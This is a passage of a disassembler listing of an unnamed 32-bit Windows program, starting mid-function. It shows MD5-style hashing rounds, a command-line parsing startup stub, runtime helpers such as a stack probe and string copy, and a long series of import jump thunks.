add eax, 2441453h
rol eax, 9
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_40BB25
add eax, [edi+8]
add eax, [esi+3Ch]
add eax, 0D8A1E681h
rol eax, 0Eh
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_40BB25
add eax, [edi+4]
add eax, [esi+10h]
add eax, 0E7D3FBC8h
rol eax, 14h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_40BB25
add eax, [edi]
add eax, [esi+24h]
add eax, 21E1CDE6h
rol eax, 5
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_40BB25
add eax, [edi+0Ch]
add eax, [esi+38h]
add eax, 0C33707D6h
rol eax, 9
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_40BB25
add eax, [edi+8]
add eax, [esi+0Ch]
add eax, 0F4D50D87h
rol eax, 0Eh
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_40BB25
add eax, [edi+4]
add eax, [esi+20h]
add eax, 455A14EDh
rol eax, 14h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_40BB25
add eax, [edi]
add eax, [esi+34h]
add eax, 0A9E3E905h
rol eax, 5
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_40BB25
add eax, [edi+0Ch]
add eax, [esi+8]
add eax, 0FCEFA3F8h
rol eax, 9
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_40BB25
add eax, [edi+8]
add eax, [esi+1Ch]
add eax, 676F02D9h
rol eax, 0Eh
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_40BB25
add eax, [edi+4]
add eax, [esi+30h]
add eax, 8D2A4C8Ah
rol eax, 14h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_40BB32
add eax, [edi]
add eax, [esi+14h]
add eax, 0FFFA3942h
rol eax, 4
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_40BB32
add eax, [edi+0Ch]
add eax, [esi+20h]
add eax, 8771F681h
rol eax, 0Bh
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_40BB32
add eax, [edi+8]
add eax, [esi+2Ch]
add eax, 6D9D6122h
rol eax, 10h
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_40BB32
add eax, [edi+4]
add eax, [esi+38h]
add eax, 0FDE5380Ch
rol eax, 17h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_40BB32
add eax, [edi]
add eax, [esi+4]
add eax, 0A4BEEA44h
rol eax, 4
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_40BB32
add eax, [edi+0Ch]
add eax, [esi+10h]
add eax, 4BDECFA9h
rol eax, 0Bh
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_40BB32
add eax, [edi+8]
add eax, [esi+1Ch]
add eax, 0F6BB4B60h
rol eax, 10h
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_40BB32
add eax, [edi+4]
add eax, [esi+28h]
add eax, 0BEBFBC70h
rol eax, 17h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_40BB32
add eax, [edi]
add eax, [esi+34h]
add eax, 289B7EC6h
rol eax, 4
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_40BB32
add eax, [edi+0Ch]
add eax, [esi]
add eax, 0EAA127FAh
rol eax, 0Bh
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_40BB32
add eax, [edi+8]
add eax, [esi+0Ch]
add eax, 0D4EF3085h
rol eax, 10h
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_40BB32
add eax, [edi+4]
add eax, [esi+18h]
add eax, 4881D05h
rol eax, 17h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_40BB32
add eax, [edi]
add eax, [esi+24h]
add eax, 0D9D4D039h
rol eax, 4
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_40BB32
add eax, [edi+0Ch]
add eax, [esi+30h]
add eax, 0E6DB99E5h
rol eax, 0Bh
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_40BB32
add eax, [edi+8]
add eax, [esi+3Ch]
add eax, 1FA27CF8h
rol eax, 10h
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_40BB32
add eax, [edi+4]
add eax, [esi+8]
add eax, 0C4AC5665h
rol eax, 17h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_40BB39
add eax, [edi]
add eax, [esi]
add eax, 0F4292244h
rol eax, 6
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_40BB39
add eax, [edi+0Ch]
add eax, [esi+1Ch]
add eax, 432AFF97h
rol eax, 0Ah
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_40BB39
add eax, [edi+8]
add eax, [esi+38h]
add eax, 0AB9423A7h
rol eax, 0Fh
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_40BB39
add eax, [edi+4]
add eax, [esi+14h]
add eax, 0FC93A039h
rol eax, 15h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_40BB39
add eax, [edi]
add eax, [esi+30h]
add eax, 655B59C3h
rol eax, 6
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_40BB39
add eax, [edi+0Ch]
add eax, [esi+0Ch]
add eax, 8F0CCC92h
rol eax, 0Ah
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_40BB39
add eax, [edi+8]
add eax, [esi+28h]
add eax, 0FFEFF47Dh
rol eax, 0Fh
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_40BB39
add eax, [edi+4]
add eax, [esi+4]
add eax, 85845DD1h
rol eax, 15h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_40BB39
add eax, [edi]
add eax, [esi+20h]
add eax, 6FA87E4Fh
rol eax, 6
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_40BB39
add eax, [edi+0Ch]
add eax, [esi+3Ch]
add eax, 0FE2CE6E0h
rol eax, 0Ah
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_40BB39
add eax, [edi+8]
add eax, [esi+18h]
add eax, 0A3014314h
rol eax, 0Fh
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_40BB39
add eax, [edi+4]
add eax, [esi+34h]
add eax, 4E0811A1h
rol eax, 15h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_40BB39
add eax, [edi]
add eax, [esi+10h]
add eax, 0F7537E82h
rol eax, 6
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_40BB39
add eax, [edi+0Ch]
add eax, [esi+2Ch]
add eax, 0BD3AF235h
rol eax, 0Ah
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_40BB39
add eax, [edi+8]
add eax, [esi+8]
add eax, 2AD7D2BBh
rol eax, 0Fh
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_40BB39
add eax, [edi+4]
add eax, [esi+24h]
add eax, 0EB86D391h
rol eax, 15h
add eax, [edi+8]
mov [edi+4], eax
mov eax, dword_447B88
add [edi], eax
mov eax, dword_447B8C
add [edi+4], eax
mov eax, dword_447B90
add [edi+8], eax
mov eax, dword_447B94
add [edi+0Ch], eax
popa
pop ebp
xor eax, eax
retn 8
sub_40BB69 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40C3B4 proc near ; CODE XREF: sub_409883+D78�p
var_1C = dword ptr -1Ch
var_4 = word ptr -4
var_2 = word ptr -2
push ebp
mov ebp, esp
sub esp, 1Ch
fnstcw [ebp+var_2]
mov ax, [ebp+var_2]
or ah, 0Ch
mov [ebp+var_4], ax
fldcw [ebp+var_4]
fistp [esp+1Ch+var_1C]
mov eax, [esp+1Ch+var_1C]
fldcw [ebp+var_2]
leave
retn
sub_40C3B4 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40C3D8 proc near ; CODE XREF: sub_401219+66�p
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push edi
call sub_40C4AC ; GetCommandLineA
mov edi, eax
cmp byte ptr [edi], 22h
jnz short loc_40C40C
push 22h
mov eax, edi
inc eax
push eax
call sub_40CA04
add esp, 8
mov [ebp+var_4], eax
or eax, eax
jz short loc_40C427
mov edi, eax
inc edi
jmp short loc_40C404
; ---------------------------------------------------------------------------
loc_40C403: ; CODE XREF: sub_40C3D8+2F�j
inc edi
loc_40C404: ; CODE XREF: sub_40C3D8+29�j
cmp byte ptr [edi], 20h
jz short loc_40C403
jmp short loc_40C427
; ---------------------------------------------------------------------------
loc_40C40B: ; CODE XREF: sub_40C3D8+3E�j
inc edi
loc_40C40C: ; CODE XREF: sub_40C3D8+F�j
movsx eax, byte ptr [edi]
or eax, eax
jz short loc_40C418
cmp eax, 20h
jnz short loc_40C40B
loc_40C418: ; CODE XREF: sub_40C3D8+39�j
jmp short loc_40C41B
; ---------------------------------------------------------------------------
loc_40C41A: ; CODE XREF: sub_40C3D8+4D�j
inc edi
loc_40C41B: ; CODE XREF: sub_40C3D8:loc_40C418�j
movsx eax, byte ptr [edi]
or eax, eax
jz short loc_40C427
cmp eax, 20h
jz short loc_40C41A
loc_40C427: ; CODE XREF: sub_40C3D8+24�j
; sub_40C3D8+31�j ...
push 0
call sub_40C500 ; GetModuleHandleA
push 1
push edi
push 0
push eax
call sub_40A74E
pop edi
leave
retn
sub_40C3D8 endp
; =============== S U B R O U T I N E =======================================
sub_40C43C proc near ; CODE XREF: sub_401320+8�p
; sub_402AD6+8�p ...
var_FFC = dword ptr -0FFCh
pop ecx
loc_40C43D: ; CODE XREF: sub_40C43C+14�j
sub esp, 1000h
sub eax, 1000h
test [esp+0FFCh+var_FFC], eax
cmp eax, 1000h
jnb short loc_40C43D
sub esp, eax
test [esp+0FFCh+var_FFC], eax
jmp ecx
sub_40C43C endp ; sp-analysis failed
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_40C45C proc near ; CODE XREF: sub_401B83+E8�p
; sub_40538B+37�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov edx, [esp+arg_4]
xor eax, eax
mov ecx, 0FFFFFFFFh
xchg edi, edx
repne scasb
neg ecx
lea ecx, [ecx-1]
mov eax, [esp+arg_4]
xchg eax, esi
mov edi, [esp+arg_0]
rep movsb
xchg eax, esi
xchg edx, edi
mov eax, [esp+arg_0]
retn 8
sub_40C45C endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C488 proc near ; CODE XREF: sub_404313+43�p
; sub_4062A9+473�p ...
jmp ds:dword_448374
sub_40C488 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C494 proc near ; CODE XREF: sub_40A74E+31E�p
jmp ds:dword_448378
sub_40C494 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C4A0 proc near ; CODE XREF: sub_4062A9+13B�p
; sub_408C55+C0�p
jmp ds:dword_44837C
sub_40C4A0 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C4AC proc near ; CODE XREF: sub_40C3D8+5�p
jmp ds:dword_448380
sub_40C4AC endp
; ---------------------------------------------------------------------------
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C4B8 proc near ; CODE XREF: sub_401490+7�p
; sub_4015B0+F�p ...
jmp ds:dword_448384
sub_40C4B8 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C4C4 proc near ; CODE XREF: sub_401D0D:loc_401EAF�p
; sub_402246+84�p ...
jmp ds:dword_448388
sub_40C4C4 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C4D0 proc near ; CODE XREF: sub_401A43+62�p
; sub_409883+694�p
jmp ds:dword_44838C
sub_40C4D0 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C4DC proc near ; CODE XREF: sub_408472+D4�p
jmp ds:dword_448390
sub_40C4DC endp
; ---------------------------------------------------------------------------
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C4E8 proc near ; CODE XREF: sub_401320:loc_4013D3�p
; sub_401490+C�p ...
jmp ds:dword_448394
sub_40C4E8 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C4F4 proc near ; CODE XREF: sub_403B8E+126�p
; sub_4041B6+57�p ...
jmp ds:dword_448398
sub_40C4F4 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C500 proc near ; CODE XREF: sub_402246+16�p
; sub_40256D+10D�p ...
jmp ds:dword_44839C
sub_40C500 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C50C proc near ; CODE XREF: sub_402246+23�p
; sub_402246+3B�p ...
jmp ds:dword_4483A0
sub_40C50C endp
; ---------------------------------------------------------------------------
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C518 proc near ; CODE XREF: sub_4015B0+5B�p
; sub_4017D2:loc_401836�p ...
jmp ds:dword_4483A4
sub_40C518 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C524 proc near ; CODE XREF: sub_403A7B+58�p
; sub_4041B6+A4�p ...
jmp ds:dword_4483A8
sub_40C524 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C530 proc near ; CODE XREF: sub_401320+7A�p
; sub_401A43+A2�p ...
jmp ds:dword_4483AC
sub_40C530 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C53C proc near ; CODE XREF: sub_405636+10F�p
jmp ds:dword_4483B0
sub_40C53C endp
; ---------------------------------------------------------------------------
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C548 proc near ; CODE XREF: sub_401320+10�p
; sub_401320+28�p ...
jmp ds:dword_4483B4
sub_40C548 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C554 proc near ; CODE XREF: sub_401320+7F�p
; sub_401D0D+2B1�p ...
jmp ds:dword_4483B8
sub_40C554 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C560 proc near ; CODE XREF: sub_4041B6+77�p
; sub_40A74E+DB�p
jmp ds:dword_4483BC
sub_40C560 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C56C proc near ; CODE XREF: sub_403A7B+B3�p
jmp ds:dword_4483C0
sub_40C56C endp
; ---------------------------------------------------------------------------
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C578 proc near ; CODE XREF: sub_4041B6+120�p
; sub_409883+ABE�p ...
jmp ds:dword_4483C4
sub_40C578 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C584 proc near ; CODE XREF: sub_4034C6+8D�p
; sub_403780+4E�p ...
jmp ds:dword_4483C8
sub_40C584 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C590 proc near ; CODE XREF: sub_40355C+92�p
; .text:004039D6�p
jmp ds:dword_4483CC
sub_40C590 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C59C proc near ; CODE XREF: sub_40355C+68�p
; .text:00403999�p
jmp ds:dword_4483D0
sub_40C59C endp
; ---------------------------------------------------------------------------
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C5A8 proc near ; CODE XREF: sub_402AD6+21C�p
jmp ds:dword_4483D4
sub_40C5A8 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C5B4 proc near ; CODE XREF: sub_4062A9+45�p
jmp ds:dword_4483D8
sub_40C5B4 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C5C0 proc near ; CODE XREF: sub_402AD6+1E8�p
jmp ds:dword_4483DC
sub_40C5C0 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C5CC proc near ; CODE XREF: sub_402AD6+5B6�p
jmp ds:dword_4483E0
sub_40C5CC endp
; ---------------------------------------------------------------------------
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C5D8 proc near ; CODE XREF: sub_401A43+9C�p
; sub_401B83+ED�p ...
jmp ds:dword_4483E4
sub_40C5D8 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C5E4 proc near ; CODE XREF: sub_402AD6+C6�p
jmp ds:dword_4483E8
sub_40C5E4 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C5F0 proc near ; CODE XREF: sub_4062A9+439�p
; sub_40A74E+2C1�p
jmp ds:dword_4483EC
sub_40C5F0 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C5FC proc near ; CODE XREF: sub_401A43+6F�p
; sub_4051C3+48�p ...
jmp ds:dword_4483F0
sub_40C5FC endp
; ---------------------------------------------------------------------------
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C608 proc near ; CODE XREF: sub_4051C3+81�p
; sub_405636+76�p ...
jmp ds:dword_4483F4
sub_40C608 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C614 proc near ; CODE XREF: sub_40A6EA+30�p
jmp ds:dword_4483F8
sub_40C614 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C620 proc near ; CODE XREF: sub_4051C3+1A�p
jmp ds:dword_4483FC
sub_40C620 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C62C proc near ; CODE XREF: sub_401320+72�p
; sub_401A43+97�p
jmp ds:dword_448400
sub_40C62C endp
; ---------------------------------------------------------------------------
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C638 proc near ; CODE XREF: sub_40107A+13�p
jmp ds:dword_448404
sub_40C638 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C644 proc near ; CODE XREF: sub_402AD6+4A4�p
; sub_408884+74�p
jmp ds:dword_448408
sub_40C644 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C650 proc near ; CODE XREF: sub_401320+41�p
; sub_401A43+22�p ...
jmp ds:dword_44840C
sub_40C650 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C65C proc near ; CODE XREF: sub_4052F4+57�p
; sub_40815F+1E4�p ...
jmp ds:dword_448410
sub_40C65C endp
; ---------------------------------------------------------------------------
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C668 proc near ; CODE XREF: sub_408472+F1�p
jmp ds:dword_448414
sub_40C668 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C674 proc near ; CODE XREF: sub_4062A9+369�p
; sub_4062A9+396�p
jmp ds:dword_448418
sub_40C674 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C680 proc near ; CODE XREF: sub_4062A9+56B�p
; sub_408C55+1E3�p
jmp ds:dword_44841C
sub_40C680 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C68C proc near ; CODE XREF: sub_40876A+21�p
jmp ds:dword_448420
sub_40C68C endp
; ---------------------------------------------------------------------------
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C698 proc near ; CODE XREF: sub_408792+1A�p
jmp ds:dword_448424
sub_40C698 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C6A4 proc near ; CODE XREF: sub_402AD6+4D2�p
jmp ds:dword_448428
sub_40C6A4 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C6B0 proc near ; CODE XREF: sub_4068E8+32�p
jmp ds:dword_44842C
sub_40C6B0 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C6BC proc near ; CODE XREF: sub_403B8E+180�p
; sub_40439D+D1�p ...
jmp ds:dword_448430
sub_40C6BC endp
; ---------------------------------------------------------------------------
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C6C8 proc near ; CODE XREF: sub_403B8E+E2�p
; sub_403D18+2AC�p ...
jmp ds:dword_448434
sub_40C6C8 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C6D4 proc near ; CODE XREF: sub_40A74E+4F5�p
jmp ds:dword_448438
sub_40C6D4 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C6E0 proc near ; CODE XREF: sub_401B83+C5�p
; sub_405559+1C�p ...
jmp ds:dword_44843C
sub_40C6E0 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C6EC proc near ; CODE XREF: sub_4068E8+13�p
jmp ds:dword_448440
sub_40C6EC endp
; ---------------------------------------------------------------------------
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C6F8 proc near ; CODE XREF: sub_4062A9+2C4�p
; sub_408C55+18C�p
jmp ds:dword_448444
sub_40C6F8 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C704 proc near ; CODE XREF: sub_407FE2+37�p
; sub_40A74E+7A3�p
jmp ds:dword_448448
sub_40C704 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C710 proc near ; CODE XREF: sub_40AF80+104�p
jmp ds:dword_448454
sub_40C710 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C71C proc near ; CODE XREF: sub_4062A9+3BB�p
; sub_406A35+9F�p ...
jmp ds:dword_448458
sub_40C71C endp
; ---------------------------------------------------------------------------
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C728 proc near ; CODE XREF: sub_408EFF+64�p
; sub_40B090+112�p ...
jmp ds:dword_44845C
sub_40C728 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C734 proc near ; CODE XREF: sub_4062A9+340�p
jmp ds:dword_448460
sub_40C734 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C740 proc near ; CODE XREF: sub_408E57+29�p
; sub_408E57+8F�p
jmp ds:dword_448464
sub_40C740 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C74C proc near ; CODE XREF: sub_408E57+59�p
jmp ds:dword_448468
sub_40C74C endp
; ---------------------------------------------------------------------------
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C758 proc near ; CODE XREF: sub_408EFF+96A�p
; sub_40AF80+4D�p ...
jmp ds:dword_44846C
sub_40C758 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C764 proc near ; CODE XREF: sub_406D91+9C�p
jmp ds:dword_448470
sub_40C764 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C770 proc near ; CODE XREF: sub_40A74E+42E�p
jmp ds:dword_448474
sub_40C770 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C77C proc near ; CODE XREF: sub_40A74E+7E7�p
jmp ds:dword_448478
sub_40C77C endp
; ---------------------------------------------------------------------------
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C788 proc near ; CODE XREF: sub_40A74E+450�p
jmp ds:dword_44847C
sub_40C788 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C794 proc near ; CODE XREF: sub_40B090+409�p
; sub_40B090+4B6�p ...
jmp ds:dword_448480
sub_40C794 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C7A0 proc near ; CODE XREF: sub_40A74E+822�p
jmp ds:dword_448484
sub_40C7A0 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C7AC proc near ; CODE XREF: sub_408EFF+8B6�p
; sub_408EFF+8E4�p ...
jmp ds:dword_448488
sub_40C7AC endp
; ---------------------------------------------------------------------------
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C7B8 proc near ; CODE XREF: sub_408EFF+8D2�p
; sub_408EFF+8FB�p ...
jmp ds:dword_44848C
sub_40C7B8 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C7C4 proc near ; CODE XREF: sub_404502+5C�p
